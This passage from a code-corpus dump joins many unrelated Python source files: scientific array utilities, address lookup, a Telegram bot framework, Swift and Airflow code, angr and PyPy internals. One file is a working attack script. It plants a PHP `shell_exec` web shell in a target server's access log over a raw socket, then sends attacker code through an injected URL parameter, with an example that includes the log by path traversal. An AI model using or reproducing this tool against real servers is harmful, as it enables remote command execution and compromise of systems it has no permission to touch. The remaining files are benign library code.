if isinstance(ndim, set):
if a.ndim not in ndim:
raise ValueError(
f"Number of dimensions ({a.ndim}) does not match one of {ndim}"
)
elif ndim != a.ndim:
raise ValueError(f"Number of dimensions ({a.ndim}) does not match {ndim}")
def encode_array(x: ArrayLike) -> Tuple[ArrayLike, List[Any]]:
"""Encode array values as integers indexing unique values.
The codes created for each unique element in the array correspond
to order of appearance, not the natural sort order for the array
dtype.
Examples
--------
>>> encode_array(['c', 'a', 'a', 'b']) # doctest: +SKIP
(array([0, 1, 1, 2], dtype=int64), array(['c', 'a', 'b'], dtype='<U1'))
Parameters
----------
x
[array-like, shape: (M,)]
Array of elements to encode of any type.
Returns
-------
indexes : (M,) ndarray
Encoded values as integer indices.
values : ndarray
Unique values in original array in order of appearance.
"""
# argsort not implemented in dask: https://github.com/dask/dask/issues/4368
names, index, inverse = np.unique(x, return_index=True, return_inverse=True) # type: ignore[no-untyped-call]
index = np.argsort(index)
rank = np.empty_like(index)
rank[index] = np.arange(len(index))
return rank[inverse], names[index]
class MergeWarning(UserWarning):
"""Warnings about merging datasets."""
pass
def merge_datasets(input: Dataset, output: Dataset) -> Dataset:
"""Merge the input and output datasets into a new dataset, giving precedence to variables
and attributes in the output.
Parameters
----------
input
The input dataset.
output
The output dataset.
Returns
-------
Dataset
The merged dataset. If `input` and `output` have variables (or attributes) with the same name,
a `MergeWarning` is issued, and the corresponding variables (or attributes) from the `output`
dataset are used.
"""
input_vars = {str(v) for v in input.data_vars.keys()}
output_vars = {str(v) for v in output.data_vars.keys()}
clobber_vars = sorted(list(input_vars & output_vars))
if len(clobber_vars) > 0:
warnings.warn(
f"The following variables in the input dataset will be replaced in the output: {', '.join(clobber_vars)}",
MergeWarning,
)
ds = output.merge(input, compat="override")
# input attrs are ignored during merge, so combine them with output, and assign to the new dataset
input_attr_keys = {str(v) for v in input.attrs.keys()}
output_attr_keys = {str(v) for v in output.attrs.keys()}
clobber_attr_keys = sorted(list(input_attr_keys & output_attr_keys))
if len(clobber_attr_keys) > 0:
warnings.warn(
f"The following global attributes in the input dataset will be replaced in the output: {', '.join(clobber_attr_keys)}",
MergeWarning,
)
combined_attrs = {**input.attrs, **output.attrs}
return ds.assign_attrs(combined_attrs) # type: ignore[no-any-return, no-untyped-call]
def conditional_merge_datasets(input: Dataset, output: Dataset, merge: bool) -> Dataset:
"""Merge the input and output datasets only if `merge` is true, otherwise just return the output."""
return merge_datasets(input, output) if merge else output
def define_variable_if_absent(
ds: Dataset,
default_variable_name: Hashable,
variable_name: Optional[Hashable],
func: Callable[[Dataset], Dataset],
) -> Dataset:
"""Define a variable in a dataset using the given function if it's missing.
Parameters
----------
ds : Dataset
The dataset to look for the variable, and used by the function to calculate the variable.
default_variable_name
The default name of the variable.
variable_name
The actual name of the variable, or None to use the default.
func
The function to calculate the variable.
Returns
-------
A new dataset containing the variable.
Raises
------
ValueError
If a variable with a non-default name is missing from the dataset.
"""
variable_name = variable_name or default_variable_name
if variable_name in ds:
return ds
if variable_name != default_variable_name:
raise ValueError(
f"Variable '{variable_name}' with non-default name is missing and will not be automatically defined."
)
return func(ds)
def create_dataset(
data_vars: Mapping[Hashable, Any] = None, # type: ignore[assignment]
coords: Mapping[Hashable, Any] = None, # type: ignore[assignment]
attrs: Mapping[Hashable, Any] = None, # type: ignore[assignment]
) -> Dataset:
"""Create an Xarray dataset and validate its variables.
This is a wrapper around `xarray.Dataset`, with the additional
convenience of validating variables against the ones defined by sgkit,
and annotating these variables with a `comment` attribute containing
their doc comments.
Parameters
----------
data_vars
A mapping defining data variables.
coords
A mapping defining coordinates.
attrs
Global attributes.
Returns
-------
A new dataset.
"""
ds = Dataset(data_vars, coords, attrs)
ds = variables.annotate(ds)
return ds
def split_array_chunks(n: int, blocks: int) -> Tuple[int, ...]:
"""Compute chunk sizes for an array split into blocks.
    This is similar to `numpy.array_split` except that it
will compute the sizes of the resulting splits rather
than explicitly partitioning an array.
Parameters
----------
n
Number of array elements.
blocks
Number of partitions to generate chunk sizes for.
Examples
--------
>>> split_array_chunks(7, 2)
(4, 3)
>>> split_array_chunks(7, 3)
(3, 2, 2)
>>> split_array_chunks(7, 1)
(7,)
>>> split_array_chunks(7, 7)
(1, 1, 1, 1, 1, 1, 1)
Raises
------
ValueError
* If `blocks` > `n`.
* If `n` <= 0.
* If `blocks` <= 0.
Returns
-------
chunks : Tuple[int, ...]
Number of elements associated with each block.
This will equal `n//blocks` or `n//blocks + 1` for
each block, depending on how many of the latter
are necessary to make the partitioning complete.
"""
if blocks > n:
raise ValueError(
f"Number of blocks ({blocks}) cannot be greater "
f"than number of elements ({n})"
)
if n <= 0:
raise ValueError(f"Number of elements ({n}) must be >= 0")
if blocks <= 0:
raise ValueError(f"Number of blocks ({blocks}) must be >= 0")
n_div, n_mod = np.divmod(n, blocks)
chunks = n_mod * (n_div + 1,) + (blocks - n_mod) * (n_div,)
return chunks # type: ignore[no-any-return]
def max_str_len(a: ArrayLike) -> ArrayLike:
"""Compute maximum string length for elements of an array
Parameters
----------
a
Array of any shape, must have string or object dtype
Returns
-------
max_length
Scalar array with same type as provided array
"""
if a.size == 0:
raise ValueError("Max string length cannot be calculated for empty array")
if a.dtype.kind == "O":
a = a.astype(str)
if a.dtype.kind not in {"U", "S"}:
raise ValueError(f"Array must have string dtype (got dtype {a.dtype})")
lens = np.frompyfunc(len, 1, 1)(a) # type: ignore[no-untyped-call]
if isinstance(a, np.ndarray):
lens = np.asarray(lens)
return lens.max()
@guvectorize( # type: ignore
[
"void(int8[:], int64[:])",
"void(int16[:], int64[:])",
"void(int32[:], int64[:])",
"void(int64[:], int64[:])",
],
"(n)->()",
nopython=True,
cache=True,
)
def hash_array(x: ArrayLike, out: ArrayLike) -> None: # pragma: no cover
"""Hash entries of ``x`` using the DJBX33A hash function.
This is ~5 times faster than calling ``tobytes()`` followed
by ``hash()`` on array columns. This function also does not
hold the GIL, making it suitable for use with the Dask
threaded scheduler.
Parameters
----------
x
1D array of type integer.
Returns
-------
Array containing a single hash value of type int64.
"""
out[0] = 5381
for i in range(x.shape[0]):
out[0] = out[0] * 33 + x[i]
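# Quick illustration (comment only): because ``hash_array`` is a guvectorized
# kernel with signature "(n)->()", applying it to a 2D integer array hashes
# each row independently, e.g.
#   rows = np.array([[1, 2, 3], [1, 2, 3], [4, 5, 6]])
#   hash_array(rows)   # equal rows map to equal int64 hash values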
|
py | 1a40b115f802caa52f93c7912c18a0397b9f2122 | #!/usr/bin/env python
import urllib
import requests
import argparse
import socket
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', required=True, type=str, help='file with code to send')
parser.add_argument('-u', '--url', required=True, type=str, help='full vulnerable url (minus injected parameter')
parser.add_argument('-p', '--parameter', required=True, type=str, help='injected parameter (ex: cmd)')
parser.add_argument('-v', '--verbose', action='count', default=0, help='v: increased detail; vv: even more detail')
parser.add_argument('--inject', action='store_true', help='inject php parse code')
parser.add_argument('--target', type=str, help='target to inject parser')
parser.add_argument('--port', default=80, type=int, help='port to inject (default: 80)')
args = parser.parse_args()
def inject_php_parser(target, port, parameter, verbose):
if target is None:
print '[!] you must provide a target with the inject parameter! Exiting...'
exit(2)
if target.startswith('http://'):
tmp_target = target[7:]
elif target.startswith('https://'):
tmp_target = target[8:]
else:
tmp_target = target
local_target = socket.gethostbyname(tmp_target)
param_parse = "<?php echo shell_exec($_GET['{0}']);?>".format(parameter)
print '[+] inject php parameter parser enabled'
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose > 0:
print '[+] connecting to {0} on port {1}'.format(local_target, port)
client.connect((local_target, port))
if verbose > 0:
print '[+] injecting: {0}'.format(param_parse)
client.send(param_parse + '\x0d\x0a')
client.close()
def poision_web_logs(infile, inurl, parameter, verbose):
print '[+] url: {0}, parameter: {1}'.format(inurl, parameter)
with open(infile, 'rb') as f:
print '[+] code read from file: {0}'.format(infile)
print '[+] sending requests...'
status_codes = []
for line in f.readlines():
# eliminate whitespace & newlines
line = line.strip()
tmp_url = inurl.split('&')
if verbose > 1:
print
print 'VERBOSE: {0}'.format(tmp_url)
# save end parameter separate, in case of null byte inclusion
end_url = ''
if len(tmp_url) > 0:
end_url = tmp_url.pop()
if verbose > 1:
print 'VERBOSE: {0}'.format(end_url)
# stitch url back together with &'s
url = '&'.join(tmp_url)
# strip leftmost &
url = url.lstrip('&')
if verbose > 1:
print 'VERBOSE: {0}'.format(url)
# append the parameter + encoded line of code + last parameter
url += '&{0}={1}&{2}'.format(parameter, urllib.quote_plus(line), end_url).rstrip('&')
if verbose > 1:
print 'VERBOSE: {0}'.format(url)
if verbose > 0:
print '[+] sending: {0}'.format(url)
r = requests.get(url, headers={'user-agent': 'Mozilla'})
status_codes.append(r.status_code)
if verbose > 0:
if r.status_code == 200:
print '[+] success!'
else:
print '[!] error: {0} - {1}'.format(r.status_code, r.reason)
if len(set(status_codes)) == 1 and 200 in set(status_codes):
print '[+] 100% successful transfer!'
else:
print '[!] You encountered errors with the transfer. Response codes: {}'.format(set(status_codes))
if __name__ == '__main__':
if args.inject:
inject_php_parser(args.target, args.port, args.parameter, args.verbose)
poision_web_logs(args.file, args.url, args.parameter, args.verbose)
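# Example invocation (illustrative only; the script name, payload file, target
# host and log path below are placeholders, not values from this repository):
#   ./poison.py -f payload.txt -p cmd -v \
#       -u "http://target/view.php?page=../../../var/log/apache2/access.log"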
|
py | 1a40b15add0bc5a380920aa770910e39db1dd7c0 | import json, urllib
import xmltodict
import logging
import concurrent.futures
from urllib import request, parse
from .parser import search_result
from .proj_convertor import ProjConvertor
from .address_factory import AddressFactory
logger = logging.getLogger(__name__)
OGCIO_RECORD_COUNT = 200
NEAR_THRESHOLD = 0.05 # 50 metres
def search_address_with_ogcio(address):
ogcio_url = "https://www.als.ogcio.gov.hk/lookup?q={}&n={}".format(
parse.quote(address), OGCIO_RECORD_COUNT
)
post_response = urllib.request.urlopen(url=ogcio_url)
res = post_response.read()
ogcio_data = json.dumps(xmltodict.parse(res), ensure_ascii=False)
ogcio_data = json.loads(ogcio_data)
searched_result = search_result(address, ogcio_data)
ocgio_records = []
for data in searched_result:
address_factory = AddressFactory("ogcio", data)
ocgio_records.append(address_factory.create_address())
return ocgio_records
def search_address_from_land(address):
land_url = "https://geodata.gov.hk/gs/api/v1.0.0/locationSearch?q={}".format(
parse.quote(address)
)
post_response = urllib.request.urlopen(url=land_url)
res = post_response.read()
land_data = json.loads(res)
land_records = []
for data in land_data:
# TODO: check if def is needed
proj = ProjConvertor("EPSG:2326", "EPSG:4326", data["x"], data["y"])
lat, lng = proj.transform_projection()
data["lat"] = float("{0:.4f}".format(lat))
data["lng"] = float("{0:.4f}".format(lng))
address_factory = AddressFactory("land", data)
land_records.append(address_factory.create_address())
return land_records
def query_address(address):
# Fetch records from OGCIO & Land Department
ogcio_records = search_address_with_ogcio(address)
land_records = search_address_from_land(address)
sorted_results = []
# if records from Land Department have any exception
if len(land_records) == 0:
return ogcio_records
# 1. Best Case: Top OGCIO result appears in land result(s)
    # We compare against the first land result, but in some cases the most
    # accurate match does not appear at the top, so we search the whole list.
for land_record in land_records:
if ogcio_records[0].distance_to(land_record) < NEAR_THRESHOLD:
# Best Case: Land result and ogcio return the same address
return ogcio_records
    # 2. The best OGCIO result does not appear in the land results,
    # so we take the first land result as the reference point, keep every OGCIO result
    # that lies within NEAR_THRESHOLD of it, and sort those by distance to that land result
for ogcio_record in ogcio_records:
distance = ogcio_record.distance_to(land_records[0])
if distance < NEAR_THRESHOLD:
ogcio_record["distance"] = distance
sorted_results.append(ogcio_record)
if len(sorted_results) > 0:
        sorted_results.sort(key=lambda record: record.distance)
        return sorted_results
# 3. Not found in OGCIO but in land result.
# We try to search again from ogcio using the land result
assumed_land_result = land_records[0]
full_address_to_search = land_records[0].full_address("chi")
if full_address_to_search != "":
ogcio_records = search_address_with_ogcio(full_address_to_search)
if ogcio_records[0].distance_to(assumed_land_result) < NEAR_THRESHOLD:
# second round result is the nearest result
return ogcio_records
return land_records
def batch_query_addresses(addresses):
records = []
with concurrent.futures.ProcessPoolExecutor(max_workers=5) as executor:
futures = [executor.submit(query_address, address) for address in addresses]
for future in concurrent.futures.as_completed(futures):
records.append(future.result())
return records
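# A minimal usage sketch (assumptions: this module is importable as part of its
# package and outbound HTTPS access to the OGCIO / geodata.gov.hk endpoints is
# available). It shows how the two entry points above are typically called; the
# sample addresses are purely illustrative.
#
#   records = query_address("Example address in Hong Kong")       # single lookup
#   many = batch_query_addresses(["address one", "address two"])  # parallel lookups
#   for record in records:
#       print(record)   # Address objects built by AddressFactory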
|
py | 1a40b19f05bc1d9fbb691f39d692eac7b83b6a2e | from aiogram import Bot
from aiogram.contrib.middlewares.logging import LoggingMiddleware
from aiogram.dispatcher import Dispatcher
from aiogram.utils.executor import start_webhook, start_polling
from loguru import logger as log
from abc import ABC, abstractmethod
from utils.singletone import SingletonABC
from utils.json_config_reader import parse_config
from aiogram.contrib.fsm_storage.memory import MemoryStorage
class AbstractModel(SingletonABC):
def __init__(self, config_file_name='project.json'):
self.config = parse_config(config_file_name)
self._bot = Bot(token=self.config.api.token)
self._memory_storage = MemoryStorage()
        self._dispatcher = Dispatcher(self._bot, storage=self._memory_storage)
self._dispatcher.middleware.setup(LoggingMiddleware())
def get_dispatcher(self):
return self._dispatcher
def get_bot(self):
return self._bot
def get_storage(self):
return self._memory_storage
@abstractmethod
async def on_startup(self, _dispatcher):
pass
@abstractmethod
async def on_shutdown(self, _dispatcher):
log.info("Closing storage...")
await _dispatcher.storage.close()
await _dispatcher.storage.wait_closed()
log.info("Bot shutdown...")
@abstractmethod
def start(self):
pass
class WebhookModel(AbstractModel):
async def on_startup(self, _dispatcher):
await super().on_startup(_dispatcher)
await self._bot.set_webhook(self.config.webhook.host + self.config.webhook.path)
async def on_shutdown(self, _dispatcher):
await super().on_shutdown(_dispatcher)
await self._bot.delete_webhook()
def start(self):
log.warning("The application is running in webhook mode.")
start_webhook(
dispatcher=self._dispatcher,
webhook_path=self.config.webhook.path,
on_startup=self.on_startup,
on_shutdown=self.on_shutdown,
skip_updates=True,
host=self.config.webapp.host,
port=self.config.webapp.port,
)
class PollingModel(AbstractModel):
async def on_startup(self, _dispatcher):
await super().on_startup(_dispatcher)
async def on_shutdown(self, _dispatcher):
await super().on_shutdown(_dispatcher)
def start(self):
log.warning("The application is running in polling mode.")
start_polling(
dispatcher=self._dispatcher,
skip_updates=True,
on_shutdown=self.on_shutdown,
on_startup=self.on_startup
)
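# A minimal usage sketch (assuming a 'project.json' readable by parse_config with
# the api/webhook/webapp fields referenced above; handler registration is only
# hinted at and the names inside the comment are illustrative):
#
#   model = PollingModel()                 # singleton, builds Bot + Dispatcher
#   dp = model.get_dispatcher()
#   # register aiogram handlers on dp here, e.g. with @dp.message_handler()
#   model.start()                          # blocks and runs the polling loop
#
# Switching to WebhookModel() keeps the same interface but registers a webhook on
# startup and serves updates via start_webhook instead.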
|
py | 1a40b1a9ab40de6b34bcbd899ea03129d79969cf | import mock
import unittest
import manager
def create_mock_load_builder_fn(mock_rings):
"""To avoid the need for swift.common.ring library, mock a basic rings
dictionary, keyed by path. Each ring has enough logic to hold a dictionary
with a single 'devs' key, which stores the list of passed dev(s) by
add_dev().
If swift (actual) ring representation diverges (see _load_builder),
this mock will need to be adapted.
:param mock_rings: a dict containing the dict form of the rings
"""
def mock_load_builder_fn(path):
class mock_ring(object):
def __init__(self, path):
self.path = path
def to_dict(self):
return mock_rings[self.path]
def add_dev(self, dev):
mock_rings[self.path]['devs'].append(dev)
return mock_ring(path)
return mock_load_builder_fn
MOCK_SWIFT_RINGS = {
'account': 'account.builder',
'container': 'container.builder',
'object': 'object.builder'
}
class TestSwiftManager(unittest.TestCase):
@mock.patch('os.path.isfile')
@mock.patch.object(manager, '_load_builder')
def test_has_minimum_zones(self, mock_load_builder, mock_is_file):
mock_rings = {}
mock_load_builder.side_effect = create_mock_load_builder_fn(mock_rings)
for ring in MOCK_SWIFT_RINGS:
mock_rings[ring] = {
'replicas': 3,
'devs': [{'zone': 1}, {'zone': 2}, None, {'zone': 3}],
}
ret = manager.has_minimum_zones(MOCK_SWIFT_RINGS)
self.assertTrue(ret['result'])
# Increase the replicas to make sure that it returns false
for ring in MOCK_SWIFT_RINGS:
mock_rings[ring]['replicas'] = 4
ret = manager.has_minimum_zones(MOCK_SWIFT_RINGS)
self.assertFalse(ret['result'])
@mock.patch.object(manager, '_load_builder')
def test_exists_in_ring(self, mock_load_builder):
mock_rings = {}
mock_load_builder.side_effect = create_mock_load_builder_fn(mock_rings)
ring = 'account'
mock_rings[ring] = {
'devs': [
{'replication_port': 6000, 'zone': 1, 'weight': 100.0,
'ip': '172.16.0.2', 'region': 1, 'port': 6000,
'replication_ip': '172.16.0.2', 'parts': 2, 'meta': '',
'device': u'bcache10', 'parts_wanted': 0, 'id': 199},
None, # Ring can have holes, so add None to simulate
{'replication_port': 6000, 'zone': 1, 'weight': 100.0,
'ip': '172.16.0.2', 'region': 1, 'id': 198,
'replication_ip': '172.16.0.2', 'parts': 2, 'meta': '',
'device': u'bcache13', 'parts_wanted': 0, 'port': 6000},
]
}
node = {
'ip': '172.16.0.2',
'region': 1,
'account_port': 6000,
'zone': 1,
'replication_port': 6000,
'weight': 100.0,
'device': u'bcache10',
}
ret = manager.exists_in_ring(ring, node)
self.assertTrue(ret)
node['region'] = 2
ret = manager.exists_in_ring(ring, node)
self.assertFalse(ret)
@mock.patch.object(manager, '_write_ring')
@mock.patch.object(manager, '_load_builder')
def test_add_dev(self, mock_load_builder, mock_write_ring):
mock_rings = {}
mock_load_builder.side_effect = create_mock_load_builder_fn(mock_rings)
ring = 'account'
mock_rings[ring] = {
'devs': []
}
new_dev = {
'meta': '',
'zone': 1,
'ip': '172.16.0.2',
'device': '/dev/sdb',
'port': 6000,
'weight': 100
}
manager.add_dev(ring, new_dev)
mock_write_ring.assert_called_once()
self.assertTrue('id' not in mock_rings[ring]['devs'][0])
|
py | 1a40b1c37f4593980c4a96f8111e1b393e9ec978 | # Generated by Django 3.1.6 on 2021-06-13 16:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('forum', '0002_auto_20210613_1056'),
]
operations = [
migrations.AddField(
model_name='submission',
name='details',
field=models.TextField(blank=True, max_length=10000),
),
]
|
py | 1a40b256249697a2bb77d986fe2f208acd212ddd | def addition(a,b):
return a+b
def subtraction(a,b):
return a-b
def multiplication(a,b):
return a*b
def division(a,b):
return (a/b)
|
py | 1a40b26ff888344b053665689a9ce7b25d272aca | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.contrib.hooks.bigquery_hook import BigQueryHook
from airflow.operators.check_operator import \
CheckOperator, ValueCheckOperator, IntervalCheckOperator
from airflow.utils.decorators import apply_defaults
class BigQueryCheckOperator(CheckOperator):
"""
Performs checks against BigQuery. The ``BigQueryCheckOperator`` expects
a sql query that will return a single row. Each value on that
first row is evaluated using python ``bool`` casting. If any of the
values return ``False`` the check is failed and errors out.
Note that Python bool casting evals the following as ``False``:
* ``False``
* ``0``
* Empty string (``""``)
* Empty list (``[]``)
* Empty dictionary or set (``{}``)
Given a query like ``SELECT COUNT(*) FROM foo``, it will fail only if
    the count ``== 0``. You can craft a much more complex query that could,
    for instance, check that the table has the same number of rows as
    the source table upstream, that the count of today's partition is
    greater than yesterday's, or that a set of metrics is within
    3 standard deviations of the 7-day average.
    This operator can be used as a data quality check in your pipeline and,
    depending on where you put it in your DAG, you can choose to stop the
    critical path, preventing dubious data from being published, or run it
    on the side and receive email alerts without halting the progress of
    the DAG.
:param sql: the sql to be executed
:type sql: str
:param bigquery_conn_id: reference to the BigQuery database
:type bigquery_conn_id: str
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
"""
template_fields = ('sql',)
template_ext = ('.sql', )
@apply_defaults
def __init__(self,
sql,
bigquery_conn_id='bigquery_default',
use_legacy_sql=True,
*args, **kwargs):
super(BigQueryCheckOperator, self).__init__(sql=sql, *args, **kwargs)
self.bigquery_conn_id = bigquery_conn_id
self.sql = sql
self.use_legacy_sql = use_legacy_sql
def get_db_hook(self):
return BigQueryHook(bigquery_conn_id=self.bigquery_conn_id,
use_legacy_sql=self.use_legacy_sql)
class BigQueryValueCheckOperator(ValueCheckOperator):
"""
Performs a simple value check using sql code.
:param sql: the sql to be executed
:type sql: str
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
"""
template_fields = ('sql',)
template_ext = ('.sql', )
@apply_defaults
def __init__(self, sql,
pass_value,
tolerance=None,
bigquery_conn_id='bigquery_default',
use_legacy_sql=True,
*args, **kwargs):
super(BigQueryValueCheckOperator, self).__init__(
sql=sql, pass_value=pass_value, tolerance=tolerance,
*args, **kwargs)
self.bigquery_conn_id = bigquery_conn_id
self.use_legacy_sql = use_legacy_sql
def get_db_hook(self):
return BigQueryHook(bigquery_conn_id=self.bigquery_conn_id,
use_legacy_sql=self.use_legacy_sql)
class BigQueryIntervalCheckOperator(IntervalCheckOperator):
"""
Checks that the values of metrics given as SQL expressions are within
a certain tolerance of the ones from days_back before.
This method constructs a query like so ::
SELECT {metrics_threshold_dict_key} FROM {table}
WHERE {date_filter_column}=<date>
:param table: the table name
:type table: str
:param days_back: number of days between ds and the ds we want to check
against. Defaults to 7 days
:type days_back: int
    :param metrics_thresholds: a dictionary of ratios indexed by metrics, for
        example 'COUNT(*)': 1.5 would require a 50 percent or less difference
        between the current day and the prior days_back.
    :type metrics_thresholds: dict
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
"""
template_fields = ('table',)
@apply_defaults
def __init__(self, table, metrics_thresholds, date_filter_column='ds',
days_back=-7, bigquery_conn_id='bigquery_default',
use_legacy_sql=True, *args, **kwargs):
super(BigQueryIntervalCheckOperator, self).__init__(
table=table, metrics_thresholds=metrics_thresholds,
date_filter_column=date_filter_column, days_back=days_back,
*args, **kwargs)
self.bigquery_conn_id = bigquery_conn_id
self.use_legacy_sql = use_legacy_sql
def get_db_hook(self):
return BigQueryHook(bigquery_conn_id=self.bigquery_conn_id,
use_legacy_sql=self.use_legacy_sql)
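# A minimal DAG wiring sketch (not part of this module; the dates, connection id
# and SQL below are illustrative assumptions):
#
#   from airflow import DAG
#   from datetime import datetime
#
#   dag = DAG('bq_quality_checks', start_date=datetime(2019, 1, 1),
#             schedule_interval='@daily')
#   row_count_check = BigQueryCheckOperator(
#       task_id='row_count_not_zero',
#       sql='SELECT COUNT(*) FROM `project.dataset.table`',
#       use_legacy_sql=False,
#       bigquery_conn_id='bigquery_default',
#       dag=dag)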
|
py | 1a40b27eb0f8532faa25578096e8d0ba4f5f9190 | from .calling_conventions import DEFAULT_CC
class Callable(object):
"""
Callable is a representation of a function in the binary that can be
interacted with like a native python function.
If you set perform_merge=True (the default), the result will be returned to you, and
you can get the result state with callable.result_state.
Otherwise, you can get the resulting simulation manager at callable.result_path_group.
"""
def __init__(self, project, addr, concrete_only=False, perform_merge=True, base_state=None, toc=None, cc=None):
"""
:param project: The project to operate on
:param addr: The address of the function to use
The following parameters are optional:
:param concrete_only: Throw an exception if the execution splits into multiple paths
:param perform_merge: Merge all result states into one at the end (only relevant if concrete_only=False)
:param base_state: The state from which to do these runs
:param toc: The address of the table of contents for ppc64
:param cc: The SimCC to use for a calling convention
"""
self._project = project
self._addr = addr
self._concrete_only = concrete_only
self._perform_merge = perform_merge
self._base_state = base_state
self._toc = toc
self._cc = cc if cc is not None else DEFAULT_CC[project.arch.name](project.arch)
self._deadend_addr = project.simos.return_deadend
self.result_path_group = None
self.result_state = None
def set_base_state(self, state):
"""
Swap out the state you'd like to use to perform the call
:param state: The state to use to perform the call
"""
self._base_state = state
def __call__(self, *args):
self.perform_call(*args)
if self.result_state is not None:
return self.result_state.solver.simplify(self._cc.get_return_val(self.result_state, stack_base=self.result_state.regs.sp - self._cc.STACKARG_SP_DIFF))
else:
return None
def perform_call(self, *args):
state = self._project.factory.call_state(self._addr, *args,
cc=self._cc,
base_state=self._base_state,
ret_addr=self._deadend_addr,
toc=self._toc)
def step_func(pg):
pg2 = pg.prune()
if len(pg2.active) > 1:
raise AngrCallableMultistateError("Execution split on symbolic condition!")
return pg2
caller = self._project.factory.simulation_manager(state)
caller.run(step_func=step_func if self._concrete_only else None).unstash(from_stash='deadended')
caller.prune(filter_func=lambda pt: pt.addr == self._deadend_addr)
if len(caller.active) == 0:
raise AngrCallableError("No paths returned from function")
self.result_path_group = caller.copy()
if self._perform_merge:
caller.merge()
self.result_state = caller.active[0]
from .errors import AngrCallableError, AngrCallableMultistateError
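# A minimal usage sketch (the binary path and function address are placeholder
# assumptions; project.factory.callable is the usual way a Callable is built):
#
#   import angr
#   proj = angr.Project('/path/to/binary', auto_load_libs=False)
#   add_two = proj.factory.callable(0x400537)   # address of the target function
#   result = add_two(2, 3)                      # simplified AST of the return value
#   final_state = add_two.result_state          # merged state after the call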
|
py | 1a40b3984269800be6df9984f6a540efdc004a85 | """Implementation of the int type based on r_longlong.
Useful for 32-bit applications manipulating values a bit larger than
fits in an 'int'.
"""
import operator
from rpython.rlib.rarithmetic import LONGLONG_BIT, intmask, r_longlong, r_uint
from rpython.rlib.rbigint import rbigint
from rpython.tool.sourcetools import func_renamer, func_with_new_name
from pypy.interpreter.error import oefmt
from pypy.interpreter.gateway import WrappedDefault, unwrap_spec
from pypy.objspace.std.intobject import W_IntObject
from pypy.objspace.std.longobject import W_AbstractLongObject, W_LongObject
from pypy.objspace.std.util import COMMUTATIVE_OPS
# XXX: breaks translation
#LONGLONG_MIN = r_longlong(-1 << (LONGLONG_BIT - 1))
class W_SmallLongObject(W_AbstractLongObject):
_immutable_fields_ = ['longlong']
def __init__(self, value):
assert isinstance(value, r_longlong)
self.longlong = value
@staticmethod
def fromint(value):
return W_SmallLongObject(r_longlong(value))
@staticmethod
def frombigint(bigint):
return W_SmallLongObject(bigint.tolonglong())
def asbigint(self):
return rbigint.fromrarith_int(self.longlong)
def longval(self):
return self.longlong
def __repr__(self):
return '<W_SmallLongObject(%d)>' % self.longlong
def _int_w(self, space):
a = self.longlong
b = intmask(a)
if b == a:
return b
raise oefmt(space.w_OverflowError,
"long int too large to convert to int")
def uint_w(self, space):
a = self.longlong
if a < 0:
raise oefmt(space.w_ValueError,
"cannot convert negative integer to unsigned int")
b = r_uint(a)
if r_longlong(b) == a:
return b
raise oefmt(space.w_OverflowError,
"long int too large to convert to unsigned int")
def bigint_w(self, space, allow_conversion=True):
return self.asbigint()
def _bigint_w(self, space):
return self.asbigint()
def _float_w(self, space):
return float(self.longlong)
def int(self, space):
if type(self) is W_SmallLongObject:
return self
if not space.is_overloaded(self, space.w_int, '__int__'):
return W_LongObject(self.num)
return W_Root.int(self, space)
def descr_float(self, space):
return space.newfloat(float(self.longlong))
def descr_neg(self, space):
a = self.longlong
try:
if a == r_longlong(-1 << (LONGLONG_BIT-1)):
raise OverflowError
x = -a
except OverflowError:
self = _small2long(space, self)
return self.descr_neg(space)
return W_SmallLongObject(x)
def descr_abs(self, space):
return self if self.longlong >= 0 else self.descr_neg(space)
def descr_bool(self, space):
return space.newbool(bool(self.longlong))
def descr_invert(self, space):
x = ~self.longlong
return W_SmallLongObject(x)
@unwrap_spec(w_modulus=WrappedDefault(None))
def descr_pow(self, space, w_exponent, w_modulus=None):
if isinstance(w_exponent, W_AbstractLongObject):
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
elif not isinstance(w_exponent, W_IntObject):
return space.w_NotImplemented
x = self.longlong
y = space.int_w(w_exponent)
if space.is_none(w_modulus):
try:
return _pow(space, x, y, r_longlong(0))
except ValueError:
self = self.descr_float(space)
return space.pow(self, w_exponent, space.w_None)
except OverflowError:
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
elif isinstance(w_modulus, W_IntObject):
w_modulus = w_modulus.as_w_long(space)
elif not isinstance(w_modulus, W_AbstractLongObject):
return space.w_NotImplemented
elif not isinstance(w_modulus, W_SmallLongObject):
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
z = w_modulus.longlong
if z == 0:
raise oefmt(space.w_ValueError, "pow() 3rd argument cannot be 0")
if y < 0:
# don't implement with smalllong
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
try:
return _pow(space, x, y, z)
except ValueError:
self = self.descr_float(space)
return space.pow(self, w_exponent, w_modulus)
except OverflowError:
self = _small2long(space, self)
return self.descr_pow(space, w_exponent, w_modulus)
@unwrap_spec(w_modulus=WrappedDefault(None))
def descr_rpow(self, space, w_base, w_modulus=None):
if isinstance(w_base, W_IntObject):
# Defer to w_base<W_SmallLongObject>.descr_pow
w_base = w_base.descr_long(space)
elif not isinstance(w_base, W_AbstractLongObject):
return space.w_NotImplemented
return w_base.descr_pow(space, self, w_modulus)
def _make_descr_cmp(opname):
op = getattr(operator, opname)
bigint_op = getattr(rbigint, opname)
@func_renamer('descr_' + opname)
def descr_cmp(self, space, w_other):
if isinstance(w_other, W_IntObject):
result = op(self.longlong, w_other.int_w(space))
elif not isinstance(w_other, W_AbstractLongObject):
return space.w_NotImplemented
